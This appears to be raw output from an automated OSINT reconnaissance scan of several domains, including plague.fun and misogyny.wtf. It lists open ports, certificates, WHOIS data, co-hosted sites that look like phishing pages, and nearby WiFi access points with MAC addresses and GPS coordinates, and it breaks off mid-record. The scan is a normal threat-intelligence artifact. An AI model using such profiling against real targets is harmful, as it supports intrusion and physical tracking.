Headers No Censys 0 0 2 0 None {"Content_Length": ["253"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8"}, "Server": ["cloudflare"], "Date": [""], "Connection": ["close"], "Content_Type": ["text/html"], "Cf_Ray": ["-"]} 172.67.190.129 2022-12-18 00:12:14 Physical Location No ipapi.co 0 0 2 0 None Amsterdam, North Holland, NH, Netherlands, NL 188.114.97.1 2022-12-18 00:21:34 Open TCP Port No Censys 0 0 2 0 None 104.21.19.243:2083 104.21.19.243 2022-12-18 00:09:29 Open TCP Port No LeakIX 0 0 2 0 None 81.88.52.232:443 81.88.52.232 2022-12-18 00:21:10 WiFi Access Point Nearby No Wigle.net 0 0 5 0 None ProCare-Guest (Net ID: 00:01:21:1C:30:F0) 37.7803446,-122.3906132 2022-12-18 00:16:53 Company Name No Company Name Extractor 0 0 3 0 None Cloudflare\, Inc. 
C=US,ST=California,L=San Francisco,O=Cloudflare\, Inc.,CN=sni.cloudflaressl.com
2022-12-18 00:21:54 Software Used Yes Censys 0 0 2 0 None CloudFlare CloudFlare Load Balancer 104.21.7.179
2022-12-18 00:18:13 Open TCP Port No Pulsedive 0 0 3 0 None 188.114.97.4:80 188.114.97.0/24
2022-12-18 00:06:31 Open TCP Port No Pulsedive 0 0 2 0 None 172.67.147.230:80 172.67.147.230
2022-12-18 00:16:46 Co-Hosted Site No ThreatMiner 0 0 2 0 None bancosneomc.itaumcneonm.repl.co 34.149.204.188
2022-12-18 00:21:10 WiFi Access Point Nearby No Wigle.net 0 0 5 0 None RyanLG (Net ID: 00:01:36:4F:9A:F0) 37.7803446,-122.3906132
2022-12-18 00:17:00 HTTP Headers No Web Spider 0 0 4 0 None {"content-length": "39680", "accept-ranges": "bytes", "last-modified": "Wed, 15 Dec 2021 09:50:30 GMT", "connection": "keep-alive", "etag": "\"61b9ba66-9b00\"", "date": "Sun, 18 Dec 2022 00:16:49 GMT", "x-frame-options": "SAMEORIGIN", "content-type": "application/javascript"} http://webmail.zerotwo-best-waifu.online/js/vendor/bootstrap.min.js
2022-12-18 00:09:39 Co-Hosted Site No HackerTarget 0 0 2 0 None 7626679.com 172.67.147.230
2022-12-18 00:21:51 Open TCP Port Banner No Censys 0 0 2 0 None HTTP/1.1 403 Forbidden Date: Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT Vary: Accept-Encoding Server: cloudflare CF-RAY: 77a93e8099a021ab-DUS Content-Encoding: gzip 172.67.137.37
2022-12-18 00:04:11 SSL Certificate - Raw Data No SSL Certificate Analyzer 0 0 2 0 None Certificate: Data: Version: 3 (0x2) Serial Number: 09:6b:82:e9:73:99:94:ba:fd:55:b0:21:db:c7:c8:bf Signature Algorithm: ecdsa-with-SHA256 Issuer: C=US, O=Cloudflare, Inc., CN=Cloudflare Inc ECC CA-3 Validity Not Before: Aug 3 00:00:00 2022 GMT Not After : Aug 2 23:59:59 2023 GMT Subject: C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com Subject Public Key Info: Public Key Algorithm: id-ecPublicKey Public-Key: (256 bit) pub: 04:76:16:8f:f9:e3:b6:aa:dc:0b:91:40:d8:f1:ee: e8:7f:8e:97:0e:7d:bd:b0:c5:93:63:66:fa:7b:4f: 17:a1:09:ff:20:68:33:a3:45:37:1f:e8:4b:eb:77: 53:b6:57:60:ef:a1:af:f1:36:97:26:c7:fa:95:e9: 9a:ab:1a:dd:7d ASN1 OID: prime256v1 NIST CURVE: P-256 X509v3 extensions: X509v3 Authority Key Identifier: keyid:A5:CE:37:EA:EB:B0:75:0E:94:67:88:B4:45:FA:D9:24:10:87:96:1F X509v3 Subject Key Identifier: 18:B9:52:2C:13:17:3E:3A:39:88:53:5C:BD:9C:BE:05:0B:02:25:90 X509v3 Subject Alternative Name: DNS:cdnjs.cloudflare.com, DNS:*.cdnjs.cloudflare.com, DNS:sni.cloudflaressl.com X509v3 Key Usage: critical Digital Signature X509v3 Extended Key Usage: TLS Web Server Authentication, TLS Web Client Authentication X509v3 CRL Distribution Points: Full Name: URI:http://crl3.digicert.com/CloudflareIncECCCA-3.crl Full Name: URI:http://crl4.digicert.com/CloudflareIncECCCA-3.crl X509v3 Certificate Policies: Policy: 2.23.140.1.2.2 CPS: http://www.digicert.com/CPS Authority Information Access: OCSP - URI:http://ocsp.digicert.com CA Issuers - URI:http://cacerts.digicert.com/CloudflareIncECCCA-3.crt X509v3 Basic Constraints: critical CA:FALSE CT Precertificate SCTs: Signed Certificate Timestamp: Version : v1 (0x0) Log ID : E8:3E:D0:DA:3E:F5:06:35:32:E7:57:28:BC:89:6B:C9: 03:D3:CB:D1:11:6B:EC:EB:69:E1:77:7D:6D:06:BD:6E Timestamp : Aug 3 19:12:00.178 2022 GMT Extensions: none Signature : ecdsa-with-SHA256 30:44:02:20:35:9E:7D:1C:03:B8:4A:87:C0:13:01:D5: 28:AD:64:70:5B:10:FC:72:88:58:48:7A:E3:4C:D5:27: DB:76:00:22:02:20:12:E0:E2:34:44:22:24:C1:E5:7A: 25:12:AD:9E:F8:88:A1:A0:65:AF:1A:76:C9:03:41:4F: 8A:70:C8:E6:BA:DA Signed Certificate Timestamp: Version : v1 (0x0) Log ID : 35:CF:19:1B:BF:B1:6C:57:BF:0F:AD:4C:6D:42:CB:BB: B6:27:20:26:51:EA:3F:E1:2A:EF:A8:03:C3:3B:D6:4C Timestamp : Aug 3 19:12:00.017 2022 GMT Extensions: none Signature : ecdsa-with-SHA256 30:46:02:21:00:EE:6E:D3:CF:4A:8A:13:16:AB:6B:C2: F7:32:B6:2A:5B:13:45:7A:44:ED:3B:86:8B:85:F4:94: BA:E0:8C:12:60:02:21:00:8C:46:CA:E7:C6:A7:69:C8: 22:62:61:BA:E1:29:8F:BC:3C:BF:F4:A2:81:44:80:DA: F5:C9:B6:E6:AF:CD:A6:FB Signed Certificate Timestamp: Version : v1 (0x0) Log ID : B3:73:77:07:E1:84:50:F8:63:86:D6:05:A9:DC:11:09: 4A:79:2D:B1:67:0C:0B:87:DC:F0:03:0E:79:36:A5:9A Timestamp : Aug 3 19:12:00.038 2022 GMT Extensions: none Signature : ecdsa-with-SHA256 30:46:02:21:00:E5:0C:F6:4E:3C:40:01:1A:EC:D8:91: 2D:69:6A:1C:FF:4F:75:55:8C:D7:D2:38:86:36:36:FA: EE:4F:65:29:FC:02:21:00:9F:BC:3F:8A:93:C7:A2:ED: F5:94:99:85:01:90:F2:60:36:3B:2E:03:0E:E0:46:5E: 8C:3E:16:39:2B:64:D1:78 Signature Algorithm: ecdsa-with-SHA256 30:45:02:21:00:d8:35:e0:5c:fe:c9:39:b4:06:5a:95:36:1c: 73:f4:85:1c:c5:6e:6b:ef:48:76:d6:7f:a3:fe:55:ed:82:7f: c5:02:20:7f:8c:86:3a:6f:04:3e:0d:d7:cc:87:51:a8:0d:5c: ce:bc:93:88:aa:35:4a:5c:02:bb:47:5c:7c:87:7b:21:de 188.114.97.0
2022-12-18 00:11:30 Physical Address No GLEIF 0 0 3 0 None C/O CORPORATION SERVICE COMPANY, 251 LITTLE FALLS DRIVE, WILMINGTON, US-DE, US, 19808 Identity Digital Inc.
2022-12-18 00:09:10 Open TCP Port No Pulsedive 0 0 3 0 None 188.114.96.0:2053 188.114.96.0/24
2022-12-18 00:22:14 Open TCP Port No Censys 0 0 2 0 None 172.67.169.215:2087 172.67.169.215
2022-12-18 00:22:14 HTTP Headers No Censys 0 0 2 0 None {"_encoding": {"Referrer_Policy": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Referrer_Policy": ["same-origin"], "Expires": ["Thu, 01 Jan 1970 00:00:01 GMT"], "Vary": ["Accept-Encoding"], "Server": ["cloudflare"], "Cf_Ray": ["77aa1c8a4ee62aa2-ORD"], "Connection": ["close"], "Content_Type": ["text/html; charset=UTF-8"], "Date": [""], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0"]} 172.67.169.215
2022-12-18 00:21:34 Open TCP Port No Censys 0 0 2 0 None 104.21.19.243:2082 104.21.19.243
2022-12-18 00:12:47 Physical Location No ipapi.co 0 0 2 0 None Amsterdam, North Holland, NH, Netherlands, NL 188.114.96.3
2022-12-18 00:16:57 Linked URL - Internal No Web Spider 4 0 3 0 None http://webmail.zerotwo-best-waifu.online/js/vendor/jquery-3.5.0.min.js http://webmail.zerotwo-best-waifu.online/
2022-12-18 00:20:19 Netblock Membership No RIPE 0 0 3 0 None 81.88.48.0/20 81.88.48.102
2022-12-18 00:06:53 Similar Domain Yes TLD Searcher 1 0 1 0 None plague.fr plague.fun
2022-12-18 00:16:46 Co-Hosted Site No ThreatMiner 0 0 2 0 None pichinchaonline.ecuados.repl.co 34.149.204.188
2022-12-18 00:31:03 Similar Domain Yes TLD Searcher 1 0 1 0 None plague.club plague.fun
2022-12-18 00:06:37 Open TCP Port No Pulsedive 0 0 2 0 None 188.114.96.1:80 188.114.96.1
2022-12-18 00:06:25 SSL Certificate - Raw Data No Certificate Transparency 0 0 1 0 None Certificate: Data: Version: 3 (0x2) Serial Number: f4:f0:fa:2f:ab:28:c3:7d:0e:b0:02:5f:9f:06:b1:0c Signature Algorithm: sha256WithRSAEncryption Issuer: C=US, O=Google Trust Services LLC, CN=GTS CA 1P5 Validity Not Before: Sep 20 21:18:06 2022 GMT Not After : Dec 19 21:18:05 2022 GMT Subject: CN=*.misogyny.wtf Subject Public Key Info: Public Key Algorithm: rsaEncryption RSA Public-Key: (2048 bit) Modulus: 00:a6:17:c6:04:fb:e2:e0:59:ac:2e:a8:d3:b0:cc: 12:7c:68:dc:b2:74:54:cb:14:94:48:00:d7:f9:63: a8:43:04:57:b8:d8:a0:8d:0c:ed:15:24:a6:66:77: fa:81:64:4b:6c:41:75:b8:97:36:6e:5b:da:67:e2: 1f:14:ff:22:80:94:08:62:df:99:ca:03:43:05:fa: 46:20:d2:9f:df:8f:a7:7e:8a:69:3e:61:96:51:a5: 93:54:e6:93:09:12:ee:a0:14:e5:d1:a8:c9:e9:fa: d3:4c:7b:01:0c:f0:43:a2:18:af:ea:4d:2d:73:6b: fc:fe:22:70:fd:8b:38:07:1a:44:ea:aa:73:f7:42: fd:26:ff:19:14:c3:ba:2e:83:df:a5:e8:35:43:c3: 56:62:20:4f:1a:d6:af:9d:f0:12:fa:41:e7:ab:85: a2:9e:64:93:1b:3c:57:ef:8f:c6:5f:df:42:50:d5: f1:17:6f:31:6f:b4:6c:fb:1e:7b:34:59:34:4c:69: c7:d2:93:4e:db:d9:1a:7a:6d:e6:93:2a:64:15:ed: c4:3a:75:b6:54:5f:b8:a0:42:be:d0:a2:11:79:c4: 02:b5:1e:d5:ff:ce:26:ac:1d:35:ee:3b:73:af:e0: c8:33:74:1d:fd:8a:af:cd:f1:a2:f0:e7:bb:ed:d2: e3:ab Exponent: 65537 (0x10001) X509v3 extensions: X509v3 Key Usage: critical Digital Signature, Key Encipherment X509v3 Extended Key Usage: TLS Web Server Authentication X509v3 Basic Constraints: critical CA:FALSE X509v3 Subject Key Identifier: 76:B0:8A:AE:37:8A:CB:36:D4:AF:F1:76:3B:26:4B:80:29:2E:E6:F4 X509v3 Authority Key Identifier: keyid:D5:FC:9E:0D:DF:1E:CA:DD:08:97:97:6E:2B:C5:5F:C5:2B:F5:EC:B8 Authority Information Access: OCSP - URI:http://ocsp.pki.goog/s/gts1p5/hLavwz_Rggs CA Issuers - URI:http://pki.goog/repo/certs/gts1p5.der X509v3 Subject Alternative Name: DNS:*.misogyny.wtf, DNS:misogyny.wtf X509v3 Certificate Policies: Policy: 2.23.140.1.2.1 Policy: 1.3.6.1.4.1.11129.2.5.3 X509v3 CRL Distribution Points: Full Name: URI:http://crls.pki.goog/gts1p5/utt2fHukd6E.crl CT Precertificate Poison: critical NULL Signature Algorithm: sha256WithRSAEncryption 52:14:6a:4e:2b:75:62:73:64:24:b2:8a:7d:11:88:06:c3:32: 4a:9a:de:a1:10:f4:93:90:6a:a2:95:d1:cd:b2:04:8b:94:ec: 43:0f:1d:ae:f0:36:ba:63:ee:4c:69:d3:9e:2e:c7:0d:a2:65: 8c:8c:88:31:23:86:8f:5f:89:6c:f3:d9:6b:3e:a4:ce:6d:f1: 35:cf:71:7f:5a:ea:a5:2e:71:df:3a:e9:4c:6a:cd:d8:a6:e2: ed:71:cc:b0:51:52:d0:f2:ea:2f:50:48:1e:fb:77:b9:80:d2: b1:f9:f2:63:e7:27:19:87:fd:31:6a:57:59:2f:96:dc:42:c2: 0e:46:7d:61:d8:a0:25:3b:09:31:25:6c:99:32:42:ee:25:a0: 4e:38:48:a8:80:b2:cc:ec:7d:35:a4:ee:26:b6:ba:55:01:2c: 5f:05:79:6d:cd:16:00:88:e0:eb:47:b5:7a:d4:78:86:12:7e: 3f:9b:7d:a2:6b:6c:d1:15:d3:af:cd:f3:19:89:8a:b7:67:e4: d2:d4:05:42:b4:ab:86:be:e9:a6:5a:15:05:c5:06:c4:bf:fb: 23:73:86:a8:25:01:30:9f:b4:58:13:81:8f:d5:59:84:04:c9: a1:fb:10:79:14:0c:79:84:d4:9d:0c:8c:3b:a3:c0:29:77:2f: 09:ef:9b:19 misogyny.wtf
2022-12-18 00:15:47 Non-Standard HTTP Header No Strange Header Identifier 0 0 4 0 None keep-alive: timeout=5 {"content-length": "1554", "x-powered-by": "Express", "accept-ranges": "bytes", "keep-alive": "timeout=5", "last-modified": "Sun, 11 Sep 2022 13:17:14 GMT", "connection": "keep-alive", "etag": "W/\"612-1832cb26b90\"", "cache-control": "public, max-age=0", "date": "Sun, 18 Dec 2022 00:07:18 GMT", "access-control-allow-origin": "*", "content-type": "text/css; charset=UTF-8"}
2022-12-18 00:09:35 Co-Hosted Site No HackerTarget 0 0 2 0 None imdmorat.ga 104.21.28.240
2022-12-18 00:31:52 Affiliate - Email Address No E-Mail Address Extractor 0 0 3 0 None abuse@godaddy.com Domain Name: PLAGUE.ONL Registry Domain ID: D425500000332721757-AGRS Registrar WHOIS Server: whois.godaddy.com Registrar URL: http://www.godaddy.com Updated Date: 2022-11-06T10:11:01Z Creation Date: 2019-11-05T05:26:43Z Registry Expiry Date: 2023-11-05T05:26:43Z Registrar Registration Expiration Date: Registrar: GoDaddy.com, LLC Registrar IANA ID: 146 Registrar Abuse Contact Email: abuse@godaddy.com Registrar Abuse Contact Phone: +1.4806242505 Reseller: Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited Domain Status: autoRenewPeriod https://icann.org/epp#autoRenewPeriod Registrant Organization: Domains By Proxy, LLC Registrant State/Province: Arizona Registrant Country: US Name Server: NS65.DOMAINCONTROL.COM Name Server: NS66.DOMAINCONTROL.COM DNSSEC: unsigned URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/ >>> Last update of WHOIS database: 2022-12-18T00:30:50Z <<< For more information on Whois status codes, please visit https://icann.org/epp Access to WHOIS information is provided to assist persons in determining the contents of a domain name registration record in the registry database. The data in this record is provided by The Registry Operator for informational purposes only, and accuracy is not guaranteed. This service is intended only for query-based access. You agree that you will use this data only for lawful purposes and that, under no circumstances will you use this data to (a) allow, enable, or otherwise support the transmission by e-mail, telephone, or facsimile of mass unsolicited, commercial advertising or solicitations to entities other than the data recipient's own existing customers; or (b) enable high volume, automated, electronic processes that send queries or data to the systems of Registry Operator, a Registrar, or Afilias except as reasonably necessary to register domain names or modify existing registrations. All rights reserved. Registry Operator reserves the right to modify these terms at any time. By submitting this query, you agree to abide by this policy. The Registrar of Record identified in this output may have an RDDS service that can be queried for additional information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Domain Name: plague.onl Registry Domain ID: D425500000332721757-AGRS Registrar WHOIS Server: whois.godaddy.com Registrar URL: https://www.godaddy.com Updated Date: 2022-11-06T10:10:59Z Creation Date: 2019-11-05T05:26:43Z Registrar Registration Expiration Date: 2023-11-05T05:26:43Z Registrar: GoDaddy.com, LLC Registrar IANA ID: 146 Registrar Abuse Contact Email: abuse@godaddy.com Registrar Abuse Contact Phone: +1.4806242505 Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited Registry Registrant ID: CR394993769 Registrant Name: Registration Private Registrant Organization: Domains By Proxy, LLC Registrant Street: DomainsByProxy.com Registrant Street: 2155 E Warner Rd Registrant City: Tempe Registrant State/Province: Arizona Registrant Postal Code: 85284 Registrant Country: US Registrant Phone: +1.4806242599 Registrant Phone Ext: Registrant Fax: +1.4806242598 Registrant Fax Ext: Registrant Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=plague.onl Registry Admin ID: CR394993781 Admin Name: Registration Private Admin Organization: Domains By Proxy, LLC Admin Street: DomainsByProxy.com Admin Street: 2155 E Warner Rd Admin City: Tempe Admin State/Province: Arizona Admin Postal Code: 85284 Admin Country: US Admin Phone: +1.4806242599 Admin Phone Ext: Admin Fax: +1.4806242598 Admin Fax Ext: Admin Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=plague.onl Registry Tech ID: CR394993775 Tech Name: Registration Private Tech Organization: Domains By Proxy, LLC Tech Street: DomainsByProxy.com Tech Street: 2155 E Warner Rd Tech City: Tempe Tech State/Province: Arizona Tech Postal Code: 85284 Tech Country: US Tech Phone: +1.4806242599 Tech Phone Ext: Tech Fax: +1.4806242598 Tech Fax Ext: Tech Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=plague.onl Name Server: NS65.DOMAINCONTROL.COM Name Server: NS66.DOMAINCONTROL.COM DNSSEC: unsigned URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/ >>> Last update of WHOIS database: 2022-12-18T00:31:50Z <<< For more information on Whois status codes, please visit https://icann.org/epp TERMS OF USE: The data contained in this registrar's Whois database, while believed by the registrar to be reliable, is provided "as is" with no guarantee or warranties regarding its accuracy. This information is provided for the sole purpose of assisting you in obtaining information about domain name registration records. Any use of this data for any other purpose is expressly forbidden without the prior written permission of this registrar. By submitting an inquiry, you agree to these terms and limitations of warranty. In particular, you agree not to use this data to allow, enable, or otherwise support the dissemination or collection of this data, in part or in its entirety, for any purpose, such as transmission by e-mail, telephone, postal mail, facsimile or other means of mass unsolicited, commercial advertising or solicitations of any kind, including spam. You further agree not to use this data to enable high volume, automated or robotic electronic processes designed to collect or compile this data for any purpose, including mining this data for your own personal or commercial purposes. Failure to comply with these terms may result in termination of access to the Whois database. These terms may be subject to modification at any time without notice.
2022-12-18 00:10:05 Web Server No URLScan.io 0 1 1 0 None Apache zerotwo-best-waifu.online
2022-12-18 00:25:33 Affiliate - Domain Name No DNS Resolver 0 0 3 0 None setupdns.net webmail-fr.setupdns.net
2022-12-18 00:21:34 HTTP Headers No Censys 0 0 2 0 None {"_encoding": {"Referrer_Policy": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Referrer_Policy": ["same-origin"], "Expires": ["Thu, 01 Jan 1970 00:00:01 GMT"], "Vary": ["Accept-Encoding"], "Server": ["cloudflare"], "Cf_Ray": ["77b1f17f8a712aa5-ORD"], "Connection": ["close"], "Content_Type": ["text/html; charset=UTF-8"], "Date": [""], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0"]} 104.21.19.243
2022-12-18 00:12:42 Raw Data from RIRs No ipapi.co 0 0 2 0 None {u'region_code': u'ON', u'country_tld': u'.ca', u'ip': u'104.21.27.242', u'currency_name': u'Dollar', u'currency': u'CAD', u'country_population': 37058856, u'country_code': u'CA', u'timezone': u'America/Toronto', u'city': u'Toronto', u'network': u'104.21.0.0/19', u'languages': u'en-CA,fr-CA,iu', u'version': u'IPv4', u'latitude': 43.6227, u'in_eu': False, u'utc_offset': u'-0500', u'continent_code': u'NA', u'country_name': u'Canada', u'country_capital': u'Ottawa', u'org': u'CLOUDFLARENET', u'postal': u'M5J', u'asn': u'AS13335', u'country': u'CA', u'region': u'Ontario', u'longitude': -79.3892, u'country_calling_code': u'+1', u'country_area': 9984670.0, u'country_code_iso3': u'CAN'} 104.21.27.242
2022-12-18 00:03:10 Affiliate - IP Address No DNS Look-aside 2 0 2 0 None 81.88.52.237 81.88.52.232
2022-12-18 00:09:55 Hosting Provider No Hosting Provider Identifier 0 0 2 0 None Cloudflare Inc: https://www.cloudflare.com/ 104.21.27.242
2022-12-18 00:17:54 Malicious IP Address Yes VirusTotal 0 1 2 0 None VirusTotal [188.114.96.0] https://www.virustotal.com/en/ip-address/188.114.96.0/information/ 188.114.96.0
2022-12-18 00:08:39 Netblock Membership No RIPE 0 0 2 0 None 188.114.97.0/24 188.114.97.3
2022-12-18 00:21:51 Open TCP Port Banner No Censys 0 0 2 0 None HTTP/1.1 403 Forbidden Date: Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT Vary: Accept-Encoding Server: cloudflare CF-RAY: 77ac0f6eeada2a09-ORD Content-Encoding: gzip 172.67.137.37
2022-12-18 00:04:11 Open TCP Port No SSL Certificate Analyzer 0 0 2 0 None 188.114.96.1:443 188.114.96.1
2022-12-18 00:03:06 Affiliate - IP Address No DNS Look-aside 1 0 2 0 None 34.149.204.184 34.149.204.188
2022-12-18 00:21:44 HTTP Headers No Censys 0 0 2 0 None {"Content_Length": ["253"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8"}, "Server": ["cloudflare"], "Cf_Ray": ["-"], "Connection": ["close"], "Content_Type": ["text/html"], "Date": [""]} 2606:4700:3031::6815:7b3
2022-12-18 00:08:32 Raw Data from RIRs No LeakIX 0 0 1 0 None {u'Services': None, u'Leaks': None} misogyny.wtf
2022-12-18 00:21:10 WiFi Access Point Nearby No Wigle.net 0 0 5 0 None SpeedStream (Net ID: 00:01:24:F0:B4:05) 37.7803446,-122.3906132
2022-12-18 00:21:06 BGP AS Membership No Censys 0 0 2 0 None 13335 172.67.147.230
2022-12-18 00:21:10 WiFi Access Point Nearby No Wigle.net 0 0 5 0 None 043320 (Net ID: 00:02:2D:04:33:20) 37.7803446,-122.3906132
2022-12-18 00:03:12 Internet Name - Unresolved No DNS Resolver 0 0 2 0 None plague.fun Certificate: Data: Version: 3 (0x2) Serial Number: e5:46:5a:b1:fb:47:13:cc:0e:4e:81:45:49:c8:68:c3 Signature Algorithm: sha256WithRSAEncryption Issuer: C=US, O=Google Trust Services LLC, CN=GTS CA 1P5 Validity Not Before: Sep 1 20:47:45 2022 GMT Not After : Nov 30 20:47:44 2022 GMT Subject: CN=*.plague.fun Subject Public Key Info: Public Key Algorithm: rsaEncryption RSA Public-Key: (2048 bit) Modulus: 00:b8:a8:f1:ca:81:88:62:ce:b7:cb:e5:5f:70:5d: a9:d6:19:67:8b:9a:69:7c:3e:b0:1a:bf:ee:8e:41: 4b:60:c8:0e:71:b0:ee:9d:06:89:ea:42:9b:af:7c: 48:a8:dc:72:38:b2:40:b2:8b:0c:71:d6:cf:8c:4c: 53:f8:67:e4:7f:60:a0:99:71:a1:b8:43:c5:ac:14: 39:cc:43:b8:4b:37:35:d7:ce:16:69:79:a3:d5:53: e2:6e:2c:f7:a6:1f:8c:b4:ec:ce:6e:53:98:9b:ab: 62:08:cf:8d:70:8f:b2:0a:bd:98:3d:36:e1:f9:e1: bf:19:54:07:8d:e9:35:76:fe:c6:0f:41:8f:3b:e5: a6:09:2f:df:f1:e2:47:95:78:fa:a2:a2:32:98:b0: 41:0c:82:5d:b0:b9:fd:29:cd:b7:42:24:54:13:89: 34:19:e6:93:92:d4:e6:b9:ad:42:59:2a:d2:95:8b: c8:08:b5:b5:eb:f0:04:bf:bc:a5:6c:07:1a:d0:ac: 9c:9c:c8:69:a8:dd:20:73:eb:78:6f:cc:33:40:f2: ca:45:5b:11:72:b1:86:45:2f:03:d1:de:78:a2:24: 3c:ac:18:42:19:ac:73:ef:fd:c7:72:14:e3:2c:e5: 40:80:36:85:b0:76:ca:de:d3:9c:2a:c2:82:26:af: 6a:25 Exponent: 65537 (0x10001) X509v3 extensions: X509v3 Key Usage: critical Digital Signature, Key Encipherment X509v3 Extended Key Usage: TLS Web Server Authentication X509v3 Basic Constraints: critical CA:FALSE X509v3 Subject Key Identifier: 5B:64:C5:97:48:7A:C9:8D:92:D2:CA:90:DF:5B:FF:61:46:87:B1:6E X509v3 Authority Key Identifier: keyid:D5:FC:9E:0D:DF:1E:CA:DD:08:97:97:6E:2B:C5:5F:C5:2B:F5:EC:B8 Authority Information Access: OCSP - URI:http://ocsp.pki.goog/s/gts1p5/V-CqIJuvA-8 CA Issuers - URI:http://pki.goog/repo/certs/gts1p5.der X509v3 Subject Alternative Name: DNS:*.plague.fun, DNS:plague.fun X509v3 Certificate Policies: Policy: 2.23.140.1.2.1 Policy: 1.3.6.1.4.1.11129.2.5.3 X509v3 CRL Distribution Points: Full Name: URI:http://crls.pki.goog/gts1p5/EE-IMN5cLuw.crl CT Precertificate Poison: critical NULL Signature Algorithm: sha256WithRSAEncryption 2d:4d:db:39:e5:eb:23:3e:18:2b:77:dd:21:24:63:de:69:88: 0f:9e:17:b2:35:af:6e:93:1a:96:fe:0c:a3:37:af:2e:d6:43: e8:24:ee:ae:4c:2a:e5:4b:57:72:90:16:3d:61:16:54:dd:c6: 9c:eb:22:67:30:01:07:2e:49:c0:01:b6:3c:14:29:95:a2:9a: a1:63:db:08:fd:03:00:f4:54:5c:d8:4a:fc:6f:5b:26:4d:7d: 6e:43:ae:76:9e:d3:e1:69:3d:94:79:64:6c:31:03:86:51:a5: c7:ce:d8:16:24:9c:a4:8a:b7:c9:ff:56:da:53:fb:84:4b:f0: d1:e0:4e:0a:3c:53:54:98:01:77:fa:79:d4:ce:5b:1d:b2:a6: 10:93:20:f8:1c:8a:2c:af:5f:43:c4:d8:0d:53:e8:bb:41:fb: d1:7b:18:4c:9f:51:81:8a:2f:c8:da:90:df:f4:e7:d4:28:0d: 5b:1d:b4:f6:e5:90:01:1a:30:ba:7d:6c:bf:48:e6:2b:64:ea: 3a:0d:16:71:ad:c2:81:17:88:59:f8:8c:af:16:6c:9d:56:99: 20:bf:39:ed:60:8b:d6:02:c0:16:b4:76:c6:80:59:91:f8:59: 46:79:a6:23:8f:c6:43:b4:16:64:4e:77:83:33:cb:a5:f2:01: 0c:3c:cd:87
2022-12-18 00:21:11 WiFi Access Point Nearby No Wigle.net 0 0 5 0 None SurfandSip (Net ID: 00:02:2D:03:7C:7A) 37.780462,-122.390564
2022-12-18 00:09:12 Open TCP Port No Pulsedive 0 0 3 0 None 188.114.96.1:443 188.114.96.0/24
2022-12-18 00:23:12 Raw Data from RIRs No CRXcavator 1 0 1 0 None [{"platform": "Chrome", "version": "0.37", "data": {"extcalls": ["https://home.newtabgallery.com/", "https://newtabgallery.com/welcome/?theme_id=", "https://newtabgallery.com/uninstall/?theme_id"], "webstore": {"website": "", "rating": 4, "privacy_policy": "https://newtabgallery.com/privacy-policy", "last_updated": "2018-12-23", "name": "Plague Inc HD Wallpapers New Tab Theme", "price": "", "offered_by": "", "support_site": "https://www.newtabgallery.com/support", "version": "", "address": "", "short_description": "Includes HD wallpaper images of the game Plague Inc on every new tab.", "permission_warnings": [], "users": 60, "size": "413KiB", "type": "Extension", "email": "info@newtabgallery.com", "rating_users": 1, "icon": "https://lh3.googleusercontent.com/LkIiFecj0j57Vv8kQivIobtgsj7K22WUUE1FdqwQCnmDz2Nuj-45Vqyt44TeCd-CofWCIjcoSrjkv_7GX2-JA8xqVw=w128-h128-e365-rj-sc0x00ffffff"}, "risk": {"webstore": {"website": 1, "last_updated": 5, "users": 1, "address": 1, "total": 9, "rating_users": 1}, "metadata": {}, "total": 411, "csp": {"script-src": 1, "total": 377, "object-src": 1}, "permissions": {"total": 25}}, "related": {"gapecdeolbiphmnkcigpgmncnhjnkhom": {"rating": 3, "users": 466, "platform": "", "short_description": "CS GO wallpapers extension offers great images with every new tab and was made for all fans of CS GO.", "icon": 